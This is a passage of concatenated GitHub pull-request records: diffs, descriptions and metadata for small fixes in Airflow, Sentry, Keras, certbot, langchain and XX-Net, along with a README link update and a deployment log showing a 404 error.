states = json[dag_id];
g = d3.select('svg#dag-run-' + dag_id.replace(/\./g, '__dot__'))
diff --git a/airflow/www/views.py b/airflow/www/views.py
index 527907270acf4..a23b6e64186f0 100644
--- a/airflow/www/views.py
+++ b/airflow/www/views.py
@@ -298,34 +298,46 @@ def get_int_arg(value, default=0):
def dag_stats(self, session=None):
dr = models.DagRun
- filter_dag_ids = appbuilder.sm.get_accessible_dag_ids()
+ allowed_dag_ids = appbuilder.sm.get_accessible_dag_ids()
+ if 'all_dags' in allowed_dag_ids:
+ allowed_dag_ids = [dag_id for dag_id, in session.query(models.DagModel.dag_id)]
dag_state_stats = session.query(dr.dag_id, dr.state, sqla.func.count(dr.state))\
.group_by(dr.dag_id, dr.state)
+ # Filter by get parameters
+ selected_dag_ids = {
+ unquote(dag_id) for dag_id in request.args.get('dag_ids', '').split(',') if dag_id
+ }
+
+ if selected_dag_ids:
+ filter_dag_ids = selected_dag_ids.intersection(allowed_dag_ids)
+ else:
+ filter_dag_ids = allowed_dag_ids
+
+ if not filter_dag_ids:
+ return wwwutils.json_response({})
+
payload = {}
- if filter_dag_ids:
- if 'all_dags' not in filter_dag_ids:
- dag_state_stats = dag_state_stats.filter(dr.dag_id.in_(filter_dag_ids))
- data = {}
- for dag_id, state, count in dag_state_stats:
- if dag_id not in data:
- data[dag_id] = {}
- data[dag_id][state] = count
-
- if 'all_dags' in filter_dag_ids:
- filter_dag_ids = [dag_id for dag_id, in session.query(models.DagModel.dag_id)]
-
- for dag_id in filter_dag_ids:
- payload[dag_id] = []
- for state in State.dag_states:
- count = data.get(dag_id, {}).get(state, 0)
- payload[dag_id].append({
- 'state': state,
- 'count': count,
- 'dag_id': dag_id,
- 'color': State.color(state)
- })
+ dag_state_stats = dag_state_stats.filter(dr.dag_id.in_(filter_dag_ids))
+ data = {}
+
+ for dag_id, state, count in dag_state_stats:
+ if dag_id not in data:
+ data[dag_id] = {}
+ data[dag_id][state] = count
+
+ for dag_id in filter_dag_ids:
+ payload[dag_id] = []
+ for state in State.dag_states:
+ count = data.get(dag_id, {}).get(state, 0)
+ payload[dag_id].append({
+ 'state': state,
+ 'count': count,
+ 'dag_id': dag_id,
+ 'color': State.color(state)
+ })
+
return wwwutils.json_response(payload)
@expose('/task_stats')
diff --git a/tests/www/test_views.py b/tests/www/test_views.py
index 2d9d353ab89ff..ec3709097fb18 100644
--- a/tests/www/test_views.py
+++ b/tests/www/test_views.py
@@ -1395,6 +1395,22 @@ def test_dag_stats_success_for_all_dag_user(self):
self.check_content_in_response('example_subdag_operator', resp)
self.check_content_in_response('example_bash_operator', resp)
+ def test_dag_stats_success_when_selecting_dags(self):
+ resp = self.client.get('dag_stats?dag_ids=example_subdag_operator', follow_redirects=True)
+ self.assertEqual(resp.status_code, 200)
+ stats = json.loads(resp.data.decode('utf-8'))
+ self.assertNotIn('example_bash_operator', stats)
+ self.assertIn('example_subdag_operator', stats)
+
+ # Multiple
+ resp = self.client.get('dag_stats?dag_ids=example_subdag_operator,example_bash_operator',
+ follow_redirects=True)
+ self.assertEqual(resp.status_code, 200)
+ stats = json.loads(resp.data.decode('utf-8'))
+ self.assertIn('example_bash_operator', stats)
+ self.assertIn('example_subdag_operator', stats)
+ self.check_content_not_in_response('example_xcom', resp)
+
def test_task_stats_success(self):
self.logout()
self.login()
| ### Jira
- [x] My PR addresses the following [Airflow Jira](https://issues.apache.org/jira/browse/AIRFLOW/) issues and references them in the PR title.
- https://issues.apache.org/jira/browse/AIRFLOW-6238
### Description
- [x] Here are some details about my PR, including screenshots of any UI changes:
The dag_stats endpoint returns all DAGs by default. This can result in an extremely large payload (~3 MB) and a slow response time when you have a lot of DAGs (in our case 1500+).
The accompanying pull request adds a `dag_ids` GET parameter to the dag_stats endpoint, which is populated with the DAGs present on the page.
Please see related and merged issue for task_stats: https://issues.apache.org/jira/browse/AIRFLOW-6095
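For illustration, a client-side sketch of the filtered call (hypothetical host, port and DAG names, not part of this change):

```python
# Hypothetical example -- host, port and DAG names are made up.
import requests

resp = requests.get(
    "http://localhost:8080/dag_stats",
    params={"dag_ids": "example_bash_operator,example_subdag_operator"},
)
stats = resp.json()
print(stats.keys())  # only the requested DAG ids, not every DAG in the DB
```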
### Tests
- [x] My PR adds the following unit tests __OR__ does not need testing for this extremely good reason:
### Commits
- [x] My commits all reference Jira issues in their subject lines, and I have squashed multiple commits if they address the same issue. In addition, my commits follow the guidelines from "[How to write a good git commit message](http://chris.beams.io/posts/git-commit/)":
1. Subject is separated from body by a blank line
1. Subject is limited to 50 characters (not including Jira issue reference)
1. Subject does not end with a period
1. Subject uses the imperative mood ("add", not "adding")
1. Body wraps at 72 characters
1. Body explains "what" and "why", not "how"
### Documentation
- [ ] In case of new functionality, my PR adds documentation that describes how to use it.
- All the public functions and the classes in the PR contain docstrings that explain what it does
- If you implement backwards incompatible changes, please leave a note in the [Updating.md](https://github.com/apache/airflow/blob/master/UPDATING.md) so we can assign it to a appropriate release
NA. | https://api.github.com/repos/apache/airflow/pulls/6803 | 2019-12-12T15:50:29Z | 2019-12-13T09:33:47Z | 2019-12-13T09:33:47Z | 2019-12-13T09:33:47Z | 1,247 | apache/airflow | 14,613 |
fix finding time to become a better developer url | diff --git a/README.md b/README.md
index 70a8c0c..2775849 100644
--- a/README.md
+++ b/README.md
@@ -121,7 +121,7 @@ Let's be honest: algo can be a pretty dry topic. [This quora question](https://w
* [The traits of a proficient programmer](https://www.oreilly.com/ideas/the-traits-of-a-proficient-programmer)
* [The tao of programming](http://www.mit.edu/~xela/tao.html): a set of parables about programming.
* [Taking Ownership Is The Most Effective Way to Get What You Want](http://www.theeffectiveengineer.com/blog/take-ownership-of-your-goals)
-* [Finding Time to Become a Better Developer](https://medium.freecodecamp.com/finding-time-to-become-a-better-developer-eebc154881b2#.4i2t1z6q2)
+* [Finding Time to Become a Better Developer](https://medium.freecodecamp.org/finding-time-to-become-a-better-developer-eebc154881b2)
### Automation
| noticed the link was broken. this fixes it 😎 | https://api.github.com/repos/charlax/professional-programming/pulls/13 | 2019-01-20T08:26:43Z | 2019-01-20T17:45:35Z | 2019-01-20T17:45:35Z | 2019-01-20T17:45:41Z | 253 | charlax/professional-programming | 21,546 |
LS0010 | diff --git a/poetry.lock b/poetry.lock
index 3ef9848db190a1..071c60e4615d68 100644
--- a/poetry.lock
+++ b/poetry.lock
@@ -4730,14 +4730,14 @@ all = ["datasets (>=2.12.0,<3.0.0)", "nltk (>=3.8.1,<4.0.0)", "openai (>=0.27.6,
[[package]]
name = "langsmith"
-version = "0.0.9"
+version = "0.0.10"
description = "Client library to connect to the LangSmith LLM Tracing and Evaluation Platform."
category = "main"
optional = false
python-versions = ">=3.8.1,<4.0"
files = [
- {file = "langsmith-0.0.9-py3-none-any.whl", hash = "sha256:9c096ff6527ef4456fce7e54ed6f54e761f9f270862876fb2180a9338fc5fd1a"},
- {file = "langsmith-0.0.9.tar.gz", hash = "sha256:c8d953ea0474aecd74859e2fc76a7c2099d2adc07c8cecdbd1f00e749a12288b"},
+ {file = "langsmith-0.0.10-py3-none-any.whl", hash = "sha256:716412979613a5eb550c9bce33165cd1bad296eb19009040155deccef427ef07"},
+ {file = "langsmith-0.0.10.tar.gz", hash = "sha256:11e5db0d8e29ee5583cabd872eeece8ce50738737b1f52f316ac984f4a1a58c5"},
]
[package.dependencies]
@@ -12854,4 +12854,4 @@ text-helpers = ["chardet"]
[metadata]
lock-version = "2.0"
python-versions = ">=3.8.1,<4.0"
-content-hash = "9eb29c9258d3b28b022dee152627b33e6ded1064f6e071ec246e92de42e57cfb"
+content-hash = "cae082b5f45fe5564de8320fd1f39370f5e59389bf3aaa72291be531bce2e705"
diff --git a/pyproject.toml b/pyproject.toml
index c6f3893aca281e..1d41c59a7b5d54 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -120,7 +120,7 @@ cassio = {version = "^0.0.7", optional = true}
rdflib = {version = "^6.3.2", optional = true}
sympy = {version = "^1.12", optional = true}
rapidfuzz = {version = "^3.1.1", optional = true}
-langsmith = "^0.0.9"
+langsmith = "^0.0.10"
rank-bm25 = {version = "^0.2.2", optional = true}
[tool.poetry.group.docs.dependencies]
| Bump langsmith version. Has some additional UX improvements | https://api.github.com/repos/langchain-ai/langchain/pulls/7871 | 2023-07-18T07:19:24Z | 2023-07-18T07:28:38Z | 2023-07-18T07:28:38Z | 2023-07-18T07:28:38Z | 746 | langchain-ai/langchain | 43,487 |
Migrate tests in google/cloud/sensors from unittest to pytest | diff --git a/tests/providers/google/cloud/sensors/test_bigquery.py b/tests/providers/google/cloud/sensors/test_bigquery.py
index c531a70e62a12..1ee469d62802d 100644
--- a/tests/providers/google/cloud/sensors/test_bigquery.py
+++ b/tests/providers/google/cloud/sensors/test_bigquery.py
@@ -16,7 +16,7 @@
# under the License.
from __future__ import annotations
-from unittest import TestCase, mock
+from unittest import mock
import pytest
@@ -37,7 +37,7 @@
TEST_IMPERSONATION_CHAIN = ["ACCOUNT_1", "ACCOUNT_2", "ACCOUNT_3"]
-class TestBigqueryTableExistenceSensor(TestCase):
+class TestBigqueryTableExistenceSensor:
@mock.patch("airflow.providers.google.cloud.sensors.bigquery.BigQueryHook")
def test_passing_arguments_to_hook(self, mock_hook):
task = BigQueryTableExistenceSensor(
@@ -64,7 +64,7 @@ def test_passing_arguments_to_hook(self, mock_hook):
)
-class TestBigqueryTablePartitionExistenceSensor(TestCase):
+class TestBigqueryTablePartitionExistenceSensor:
@mock.patch("airflow.providers.google.cloud.sensors.bigquery.BigQueryHook")
def test_passing_arguments_to_hook(self, mock_hook):
task = BigQueryTablePartitionExistenceSensor(
@@ -104,7 +104,7 @@ def context():
yield context
-class TestBigQueryTableExistenceAsyncSensor(TestCase):
+class TestBigQueryTableExistenceAsyncSensor:
def test_big_query_table_existence_sensor_async(self):
"""
Asserts that a task is deferred and a BigQueryTableExistenceTrigger will be fired
diff --git a/tests/providers/google/cloud/sensors/test_bigquery_dts.py b/tests/providers/google/cloud/sensors/test_bigquery_dts.py
index 270f15a7bf393..c4ea153001c4e 100644
--- a/tests/providers/google/cloud/sensors/test_bigquery_dts.py
+++ b/tests/providers/google/cloud/sensors/test_bigquery_dts.py
@@ -17,7 +17,6 @@
# under the License.
from __future__ import annotations
-import unittest
from unittest import mock
from unittest.mock import MagicMock as MM
@@ -35,7 +34,7 @@
GCP_CONN_ID = "google_cloud_default"
-class TestBigQueryDataTransferServiceTransferRunSensor(unittest.TestCase):
+class TestBigQueryDataTransferServiceTransferRunSensor:
@mock.patch(
"airflow.providers.google.cloud.sensors.bigquery_dts.BiqQueryDataTransferServiceHook",
return_value=MM(get_transfer_run=MM(return_value=MM(state=TransferState.FAILED))),
diff --git a/tests/providers/google/cloud/sensors/test_cloud_composer.py b/tests/providers/google/cloud/sensors/test_cloud_composer.py
index c00521c1ebe85..8062da44b9b9a 100644
--- a/tests/providers/google/cloud/sensors/test_cloud_composer.py
+++ b/tests/providers/google/cloud/sensors/test_cloud_composer.py
@@ -17,7 +17,7 @@
from __future__ import annotations
-from unittest import TestCase, mock
+from unittest import mock
import pytest
@@ -30,7 +30,7 @@
TEST_REGION = "region"
-class TestCloudComposerEnvironmentSensor(TestCase):
+class TestCloudComposerEnvironmentSensor:
def test_cloud_composer_existence_sensor_async(self):
"""
Asserts that a task is deferred and a CloudComposerExecutionTrigger will be fired
diff --git a/tests/providers/google/cloud/sensors/test_cloud_storage_transfer_service.py b/tests/providers/google/cloud/sensors/test_cloud_storage_transfer_service.py
index 86db78c3045e8..cbf348b324b67 100644
--- a/tests/providers/google/cloud/sensors/test_cloud_storage_transfer_service.py
+++ b/tests/providers/google/cloud/sensors/test_cloud_storage_transfer_service.py
@@ -17,7 +17,6 @@
# under the License.
from __future__ import annotations
-import unittest
from unittest import mock
from parameterized import parameterized
@@ -35,7 +34,7 @@
JOB_NAME = "job-name/123"
-class TestGcpStorageTransferOperationWaitForJobStatusSensor(unittest.TestCase):
+class TestGcpStorageTransferOperationWaitForJobStatusSensor:
@mock.patch(
"airflow.providers.google.cloud.sensors.cloud_storage_transfer_service.CloudDataTransferServiceHook"
)
diff --git a/tests/providers/google/cloud/sensors/test_dataflow.py b/tests/providers/google/cloud/sensors/test_dataflow.py
index 07043b9753ab3..54de120a30fe9 100644
--- a/tests/providers/google/cloud/sensors/test_dataflow.py
+++ b/tests/providers/google/cloud/sensors/test_dataflow.py
@@ -17,7 +17,6 @@
# under the License.
from __future__ import annotations
-import unittest
from unittest import mock
import pytest
@@ -41,7 +40,7 @@
TEST_IMPERSONATION_CHAIN = ["ACCOUNT_1", "ACCOUNT_2", "ACCOUNT_3"]
-class TestDataflowJobStatusSensor(unittest.TestCase):
+class TestDataflowJobStatusSensor:
@parameterized.expand(
[
(DataflowJobStatus.JOB_STATE_DONE, DataflowJobStatus.JOB_STATE_DONE, True),
@@ -107,7 +106,7 @@ def test_poke_raise_exception(self, mock_hook):
)
-class TestDataflowJobMetricsSensor(unittest.TestCase):
+class TestDataflowJobMetricsSensor:
@parameterized.expand(
[
(DataflowJobStatus.JOB_STATE_RUNNING, True),
@@ -149,7 +148,7 @@ def test_poke(self, job_current_state, fail_on_terminal_state, mock_hook):
callback.assert_called_once_with(mock_fetch_job_metrics_by_id.return_value.__getitem__.return_value)
-class DataflowJobMessagesSensorTest(unittest.TestCase):
+class DataflowJobMessagesSensorTest:
@parameterized.expand(
[
(DataflowJobStatus.JOB_STATE_RUNNING, True),
@@ -225,7 +224,7 @@ def test_poke_raise_exception(self, mock_hook):
callback.assert_not_called()
-class DataflowJobAutoScalingEventsSensorTest(unittest.TestCase):
+class DataflowJobAutoScalingEventsSensorTest:
@parameterized.expand(
[
(DataflowJobStatus.JOB_STATE_RUNNING, True),
diff --git a/tests/providers/google/cloud/sensors/test_datafusion.py b/tests/providers/google/cloud/sensors/test_datafusion.py
index 195f02068131d..16ebb0d71f9b6 100644
--- a/tests/providers/google/cloud/sensors/test_datafusion.py
+++ b/tests/providers/google/cloud/sensors/test_datafusion.py
@@ -17,7 +17,6 @@
# under the License.
from __future__ import annotations
-import unittest
from unittest import mock
import pytest
@@ -39,7 +38,7 @@
FAILURE_STATUSES = {"FAILED"}
-class TestCloudDataFusionPipelineStateSensor(unittest.TestCase):
+class TestCloudDataFusionPipelineStateSensor:
@parameterized.expand(
[
(PipelineStates.COMPLETED, PipelineStates.COMPLETED, True),
diff --git a/tests/providers/google/cloud/sensors/test_dataplex.py b/tests/providers/google/cloud/sensors/test_dataplex.py
index dc409bc43a092..9871a2f4c5d39 100644
--- a/tests/providers/google/cloud/sensors/test_dataplex.py
+++ b/tests/providers/google/cloud/sensors/test_dataplex.py
@@ -16,7 +16,6 @@
# under the License.
from __future__ import annotations
-import unittest
from unittest import mock
import pytest
@@ -40,7 +39,7 @@
IMPERSONATION_CHAIN = ["ACCOUNT_1", "ACCOUNT_2", "ACCOUNT_3"]
-class TestDataplexTaskStateSensor(unittest.TestCase):
+class TestDataplexTaskStateSensor:
def create_task(self, state: int):
task = mock.Mock()
task.state = state
diff --git a/tests/providers/google/cloud/sensors/test_dataproc.py b/tests/providers/google/cloud/sensors/test_dataproc.py
index d05d9f62b587c..61d6d55c919ba 100644
--- a/tests/providers/google/cloud/sensors/test_dataproc.py
+++ b/tests/providers/google/cloud/sensors/test_dataproc.py
@@ -16,7 +16,6 @@
# under the License.
from __future__ import annotations
-import unittest
from unittest import mock
from unittest.mock import Mock
@@ -39,7 +38,7 @@
TIMEOUT = 120
-class TestDataprocJobSensor(unittest.TestCase):
+class TestDataprocJobSensor:
def create_job(self, state: int):
job = mock.Mock()
job.status = mock.Mock()
@@ -186,7 +185,7 @@ def test_wait_timeout_raise_exception(self, mock_hook):
sensor.poke(context={})
-class TestDataprocBatchSensor(unittest.TestCase):
+class TestDataprocBatchSensor:
def create_batch(self, state: int):
batch = mock.Mock()
batch.state = mock.Mock()
diff --git a/tests/providers/google/cloud/sensors/test_gcs.py b/tests/providers/google/cloud/sensors/test_gcs.py
index bf586dfe1c02f..642461f63a635 100644
--- a/tests/providers/google/cloud/sensors/test_gcs.py
+++ b/tests/providers/google/cloud/sensors/test_gcs.py
@@ -18,7 +18,7 @@
from __future__ import annotations
from datetime import datetime, timedelta, timezone
-from unittest import TestCase, mock
+from unittest import mock
import pendulum
import pytest
@@ -75,7 +75,7 @@ def next_time_side_effect():
mock_time = mock.Mock(side_effect=next_time_side_effect)
-class TestGoogleCloudStorageObjectSensor(TestCase):
+class TestGoogleCloudStorageObjectSensor:
@mock.patch("airflow.providers.google.cloud.sensors.gcs.GCSHook")
def test_should_pass_argument_to_hook(self, mock_hook):
task = GCSObjectExistenceSensor(
@@ -99,7 +99,7 @@ def test_should_pass_argument_to_hook(self, mock_hook):
mock_hook.return_value.exists.assert_called_once_with(TEST_BUCKET, TEST_OBJECT, DEFAULT_RETRY)
-class TestGoogleCloudStorageObjectSensorAsync(TestCase):
+class TestGoogleCloudStorageObjectSensorAsync:
def test_gcs_object_existence_sensor_async(self):
"""
Asserts that a task is deferred and a GCSBlobTrigger will be fired
@@ -139,7 +139,7 @@ def test_gcs_object_existence_sensor_async_execute_complete(self):
mock_log_info.assert_called_with("File %s was found in bucket %s.", TEST_OBJECT, TEST_BUCKET)
-class TestTsFunction(TestCase):
+class TestTsFunction:
def test_should_support_datetime(self):
context = {
"dag": DAG(dag_id=TEST_DAG_ID, schedule=timedelta(days=5)),
@@ -159,7 +159,7 @@ def test_should_support_cron(self):
assert pendulum.instance(datetime(2019, 2, 24)).isoformat() == result.isoformat()
-class TestGoogleCloudStorageObjectUpdatedSensor(TestCase):
+class TestGoogleCloudStorageObjectUpdatedSensor:
@mock.patch("airflow.providers.google.cloud.sensors.gcs.GCSHook")
def test_should_pass_argument_to_hook(self, mock_hook):
task = GCSObjectUpdateSensor(
@@ -182,7 +182,7 @@ def test_should_pass_argument_to_hook(self, mock_hook):
assert result is True
-class TestGoogleCloudStoragePrefixSensor(TestCase):
+class TestGoogleCloudStoragePrefixSensor:
@mock.patch("airflow.providers.google.cloud.sensors.gcs.GCSHook")
def test_should_pass_arguments_to_hook(self, mock_hook):
task = GCSObjectsWithPrefixExistenceSensor(
@@ -253,8 +253,8 @@ def test_execute_timeout(self, mock_hook):
mock_hook.return_value.list.assert_called_once_with(TEST_BUCKET, prefix=TEST_PREFIX)
-class TestGCSUploadSessionCompleteSensor(TestCase):
- def setUp(self):
+class TestGCSUploadSessionCompleteSensor:
+ def setup_method(self):
self.dag = DAG(
TEST_DAG_ID + "test_schedule_dag_once",
schedule="@once",
diff --git a/tests/providers/google/cloud/sensors/test_looker.py b/tests/providers/google/cloud/sensors/test_looker.py
index ceaf3c8ea98d2..567340f0864d6 100644
--- a/tests/providers/google/cloud/sensors/test_looker.py
+++ b/tests/providers/google/cloud/sensors/test_looker.py
@@ -16,7 +16,6 @@
# under the License.
from __future__ import annotations
-import unittest
from unittest import mock
import pytest
@@ -33,7 +32,7 @@
TEST_JOB_ID = "123"
-class TestLookerCheckPdtBuildSensor(unittest.TestCase):
+class TestLookerCheckPdtBuildSensor:
@mock.patch(SENSOR_PATH.format("LookerHook"))
def test_done(self, mock_hook):
mock_hook.return_value.pdt_build_status.return_value = {"status": JobStatus.DONE.value}
diff --git a/tests/providers/google/cloud/sensors/test_pubsub.py b/tests/providers/google/cloud/sensors/test_pubsub.py
index cc4191e0ee6c2..952758578c3e7 100644
--- a/tests/providers/google/cloud/sensors/test_pubsub.py
+++ b/tests/providers/google/cloud/sensors/test_pubsub.py
@@ -17,7 +17,6 @@
# under the License.
from __future__ import annotations
-import unittest
from typing import Any
from unittest import mock
@@ -32,7 +31,7 @@
TEST_SUBSCRIPTION = "test-subscription"
-class TestPubSubPullSensor(unittest.TestCase):
+class TestPubSubPullSensor:
def _generate_messages(self, count):
return [
ReceivedMessage(
diff --git a/tests/providers/google/cloud/sensors/test_tasks.py b/tests/providers/google/cloud/sensors/test_tasks.py
index a3a08e26cdc31..59356ce9e6127 100644
--- a/tests/providers/google/cloud/sensors/test_tasks.py
+++ b/tests/providers/google/cloud/sensors/test_tasks.py
@@ -17,7 +17,6 @@
# under the License.
from __future__ import annotations
-import unittest
from typing import Any
from unittest import mock
@@ -35,7 +34,7 @@
FULL_TASK_PATH = "projects/test-project/locations/asia-east2/queues/test-queue/tasks/test-task"
-class TestCloudTasksEmptySensor(unittest.TestCase):
+class TestCloudTasksEmptySensor:
@mock.patch("airflow.providers.google.cloud.sensors.tasks.CloudTasksHook")
def test_queue_empty(self, mock_hook):
 | This change removes the dependency on unittest.TestCase from the google/cloud/sensors package. The use of unittest in this package is now limited to unittest.mock, which is fine according to the original issue.
Tested using `breeze testing tests --test-type "Providers[google]"`
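For context, this is the general shape of the migration applied throughout the diff (illustrative sketch only, not copied from a specific test file):

```python
# Before: tests subclassed unittest.TestCase and used setUp().
#
#     import unittest
#     class TestExampleSensor(unittest.TestCase):
#         def setUp(self):
#             self.expected = "value"

# After: plain classes collected by pytest, with setup_method() instead.
class TestExampleSensor:
    def setup_method(self):
        self.expected = "value"

    def test_expected(self):
        assert self.expected == "value"
```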
related #29305
<!--
Thank you for contributing! Please make sure that your code changes
are covered with tests. And in case of new features or big changes
remember to adjust the documentation.
Feel free to ping committers for the review!
In case of an existing issue, reference it using one of the following:
closes: #ISSUE
related: #ISSUE
How to write a good git commit message:
http://chris.beams.io/posts/git-commit/
-->
---
**^ Add meaningful description above**
Read the **[Pull Request Guidelines](https://github.com/apache/airflow/blob/main/CONTRIBUTING.rst#pull-request-guidelines)** for more information.
In case of fundamental code changes, an Airflow Improvement Proposal ([AIP](https://cwiki.apache.org/confluence/display/AIRFLOW/Airflow+Improvement+Proposals)) is needed.
In case of a new dependency, check compliance with the [ASF 3rd Party License Policy](https://www.apache.org/legal/resolved.html#category-x).
In case of backwards incompatible changes please leave a note in a newsfragment file, named `{pr_number}.significant.rst` or `{issue_number}.significant.rst`, in [newsfragments](https://github.com/apache/airflow/tree/main/newsfragments).
| https://api.github.com/repos/apache/airflow/pulls/29642 | 2023-02-20T17:26:05Z | 2023-02-27T16:23:10Z | 2023-02-27T16:23:10Z | 2023-02-28T08:42:07Z | 3,182 | apache/airflow | 14,642 |
fix(groups): Avoid pickling GroupHash query set | diff --git a/src/sentry/api/endpoints/group_hashes.py b/src/sentry/api/endpoints/group_hashes.py
index 30afc97bcf9c3..95e358c70f0d3 100644
--- a/src/sentry/api/endpoints/group_hashes.py
+++ b/src/sentry/api/endpoints/group_hashes.py
@@ -50,7 +50,7 @@ def delete(self, request: Request, group) -> Response:
if id_list is None:
return Response()
- hash_list = (
+ hash_list = list(
GroupHash.objects.filter(project_id=group.project_id, group=group.id, hash__in=id_list)
.exclude(state=GroupHash.State.LOCKED_IN_MIGRATION)
.values_list("hash", flat=True)
| Evaluate the GroupHash query earlier. This avoids problems (see #36426) associated with pickling the QuerySet object when it's passed to `unmerge.delay`:
https://github.com/getsentry/sentry/blob/54ad1695c0e2cf570852a76ef679962a25d30942/src/sentry/api/endpoints/group_hashes.py#L61-L63
I don't think this causes any performance problems unless (for some reason I'm not seeing) it's especially important not to execute the query until after the delay, in which case I think we're already executing it on [line 58](https://github.com/getsentry/sentry/blob/54ad1695c0e2cf570852a76ef679962a25d30942/src/sentry/api/endpoints/group_hashes.py#L58). | https://api.github.com/repos/getsentry/sentry/pulls/37835 | 2022-08-15T22:24:49Z | 2022-08-16T22:19:50Z | 2022-08-16T22:19:50Z | 2022-09-01T00:02:16Z | 170 | getsentry/sentry | 44,490 |
Fixed a pair of typos in docstrings | diff --git a/acme/acme/jose/json_util.py b/acme/acme/jose/json_util.py
index 7b95e3fce4d..977a0662266 100644
--- a/acme/acme/jose/json_util.py
+++ b/acme/acme/jose/json_util.py
@@ -226,7 +226,7 @@ def encode(self, name):
:param str name: Name of the field to be encoded.
- :raises erors.SerializationError: if field cannot be serialized
+ :raises errors.SerializationError: if field cannot be serialized
:raises errors.Error: if field could not be found
"""
diff --git a/acme/acme/jose/util.py b/acme/acme/jose/util.py
index ab3606efc8a..600077b2016 100644
--- a/acme/acme/jose/util.py
+++ b/acme/acme/jose/util.py
@@ -130,7 +130,7 @@ class ImmutableMap(collections.Mapping, collections.Hashable):
"""Immutable key to value mapping with attribute access."""
__slots__ = ()
- """Must be overriden in subclasses."""
+ """Must be overridden in subclasses."""
def __init__(self, **kwargs):
if set(kwargs) != set(self.__slots__):
| https://api.github.com/repos/certbot/certbot/pulls/2073 | 2016-01-03T19:37:21Z | 2016-01-05T23:02:19Z | 2016-01-05T23:02:19Z | 2016-05-06T19:21:21Z | 289 | certbot/certbot | 2,642 |
|
Ignore hidden folders for image_dataset_from_directory | diff --git a/keras/utils/dataset_utils.py b/keras/utils/dataset_utils.py
index 35d234d6255..487a684454f 100644
--- a/keras/utils/dataset_utils.py
+++ b/keras/utils/dataset_utils.py
@@ -541,9 +541,10 @@ def index_directory(
subdirs = []
for subdir in sorted(tf.io.gfile.listdir(directory)):
if tf.io.gfile.isdir(tf.io.gfile.join(directory, subdir)):
- if subdir.endswith("/"):
- subdir = subdir[:-1]
- subdirs.append(subdir)
+ if not subdir.startswith("."):
+ if subdir.endswith("/"):
+ subdir = subdir[:-1]
+ subdirs.append(subdir)
if not class_names:
class_names = subdirs
else:
 | Ignore hidden folders (e.g. `.git`, `.ipynb`, etc.) for image_dataset_from_directory so they are not picked up as class directories.
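A minimal sketch of the intended effect (illustrative only; the directory layout and image size here are made up):

```python
# Illustrative sketch only -- paths and image size are made up.
# With this change, hidden directories such as ".git" under the data root
# are skipped instead of being treated as label/class folders.
import tensorflow as tf

ds = tf.keras.utils.image_dataset_from_directory(
    "data/",              # e.g. contains cats/, dogs/ and a hidden .git/
    image_size=(64, 64),
)
print(ds.class_names)     # expected: ['cats', 'dogs'], with '.git' ignored
```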
Fixes: https://github.com/keras-team/tf-keras/issues/187 | https://api.github.com/repos/keras-team/keras/pulls/18177 | 2023-05-30T23:14:42Z | 2023-06-30T18:36:42Z | 2023-06-30T18:36:42Z | 2024-02-01T22:32:09Z | 180 | keras-team/keras | 47,007 |
Simplify how the deployment bat forwards all arguments | diff --git a/code/default/gae_proxy/server/uploader.bat b/code/default/gae_proxy/server/uploader.bat
index 054448f945..ba5c8d4d19 100644
--- a/code/default/gae_proxy/server/uploader.bat
+++ b/code/default/gae_proxy/server/uploader.bat
@@ -1 +1 @@
-..\..\python27\1.0\python.exe uploader.py %1 %2 %3 %4 %5 %6 %7 %8 %9
+..\..\python27\1.0\python.exe uploader.py %*
 | This makes sure that all arguments are passed through to the py script.
Separately, my deployment here is also having problems (https://github.com/XX-net/XX-Net/issues/3398) - -
The authorization web page never pops up at all.
```
*****\XX-Net\code\default\gae_proxy\server>uploader.bat xxnet-1 -password 123123 -debug -xxx
*****\XX-Net\code\default\gae_proxy\server>..\..\python27\1.0\python.exe uploader.py xxnet-1 -password 123123 -debug -xxx
2016-05-16 11:39:57,901 - root - INFO - use rc4_password: 123123
2016-05-16 11:39:57,901 - root - INFO - enable debug logging
2016-05-16 11:39:57,901 - root - INFO - unknow argv: -xxx
2016-05-16 11:39:57,901 - root - INFO - set proxy to http://127.0.0.1:8087
2016-05-16 11:39:57,901 - root - INFO - ============ Begin upload ============
2016-05-16 11:39:57,901 - root - INFO - appid:xxnet-1
11:39 AM Application: xxnet-1
11:39 AM Host: appengine.google.com
11:39 AM Rolling back the update.
2016-05-16 11:39:57,938 - root - INFO - Send: /api/appversion/rollback, params={'version': '1', 'app_id': 'xxnet-1'}
2016-05-16 11:39:57,938 - google.appengine.tools.appengine_rpc - DEBUG - _Authenticate skipped auth; needs_auth=False
2016-05-16 11:39:57,938 - google.appengine.tools.appengine_rpc - DEBUG - Sending request to https://appengine.google.com/api/appversion/rollback?app_id=xxnet-1&force_rollback=0&version=1 headers={'X-appcfg-api-version': '1', 'content-length': '0', 'Content-Type': 'application/octet-stream'} body=
2016-05-16 11:39:59,355 - google.appengine.tools.appengine_rpc - DEBUG - Got http error 404.
2016-05-16 11:39:59,355 - google.appengine.tools.appengine_rpc - DEBUG - Unexpected results: {'date': 'Mon, 16 May 2016 03:40:00 GMT', 'status': '404', 'content-length': '1584', 'content-type': 'text/html; charset=UTF-8'}
Error 404: --- begin server output ---
<!DOCTYPE html>
<html lang=en>
<meta charset=utf-8>
<meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width">
<title>Error 404 (Not Found)!!1</title>
<style>
*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px}
</style>
<a href=//www.google.com/><span id=logo aria-label=Google></span></a>
<p><b>404.</b> <ins>That鈥檚 an error.</ins>
<p>The requested URL <code>/api/appversion/rollback</code> was not found on this server. <ins>That鈥檚 all we know.</ins>
--- end server output ---
